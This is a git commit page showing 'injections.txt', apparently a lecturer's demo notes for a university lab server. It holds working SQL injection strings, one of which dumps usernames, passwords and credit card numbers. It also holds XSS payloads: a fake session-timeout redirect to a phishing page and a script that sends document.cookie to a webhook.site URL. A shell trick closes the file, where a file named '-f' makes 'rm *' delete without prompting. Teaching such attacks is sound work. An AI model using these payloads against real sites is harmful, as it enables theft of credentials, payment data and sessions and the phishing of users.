Update injections.txt

mark.george / jetty

Browse code Update injections.txt master
1 parent 1af6cef commit 408089c4af7f78c4f373b14cf0ddeecb61c7339f Mark George authored on 6 Sep 2021

Patch

Showing 1 changed file

Ignore Space Show notes View injections.txt
// basic injection ' or 1=1;-- // can we exfil data? ' union select 'WOOHOO'; -- // get entire users table ' union select group_concat(username\|\|':'\|\|password\|\|':'\|\|name\|\|':'\|\|credit_card) from users as name; -- http://snafu.staff.uod.otago.ac.nz:8080/injection/ // basic injection ' or 1=1;-- // can we exfil data? ' union select 'WOOHOO'; -- // get entire users table ' union select group_concat(username\|\|':'\|\|password\|\|':'\|\|name\|\|':'\|\|credit_card) from users as name; -- // change color food<script>document.body.style.backgroundColor='#FF0000'</script> // change back button food<br/><a href="https://i.chzbgr.com/maxW500/4554986496/hF3327748/">Back</a><!-- // fake login <script>alert('Session timed out. Please log in to continue.');window.location='http://snafu.staff.uod.otago.ac.nz:8080/injection/herephishyphishy.jsp'</script> // display cookies <script>alert(document.cookie)</script> // exfil cookies <script>window.location='https://webhook.site/c3300dea-ce9d-4860-879f-6320d4c24c43?'+document.cookie</script> // setting cookie via console document.cookie = "JSESSIONID=?" --disable-xss-auditor // wildcard expansion flaw (assumes default rm has prompt-per file turned on via alias) touch a b c d rm * should see that prompt is require per-file touch a b c d touch -- '-f' rm * should see that the prompt per-file is no longer needed demonstrate the expansion via the tab key

Ignore Space Show notes View

injections.txt

http://snafu.staff.uod.otago.ac.nz:8080/injection/

// basic injection
' or 1=1;--

// can we exfil data?
' union select 'WOOHOO'; --

// get entire users table
' union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name; --

// change color
food<script>document.body.style.backgroundColor='#FF0000'</script>

// change back button
food<br/><a href="https://i.chzbgr.com/maxW500/4554986496/hF3327748/">Back</a><!--

// fake login
<script>alert('Session timed out.  Please log in to continue.');window.location='http://snafu.staff.uod.otago.ac.nz:8080/injection/herephishyphishy.jsp'</script>

// display cookies
<script>alert(document.cookie)</script>

// exfil cookies
<script>window.location='https://webhook.site/c3300dea-ce9d-4860-879f-6320d4c24c43?'+document.cookie</script>

// setting cookie via console
document.cookie = "JSESSIONID=?"

--disable-xss-auditor

// wildcard expansion flaw (assumes default rm has prompt-per file turned on via alias)
touch a b c d
rm *

should see that prompt is require per-file

touch a b c d
touch -- '-f'
rm *

should see that the prompt per-file is no longer needed

demonstrate the expansion via the tab key

Show line notes below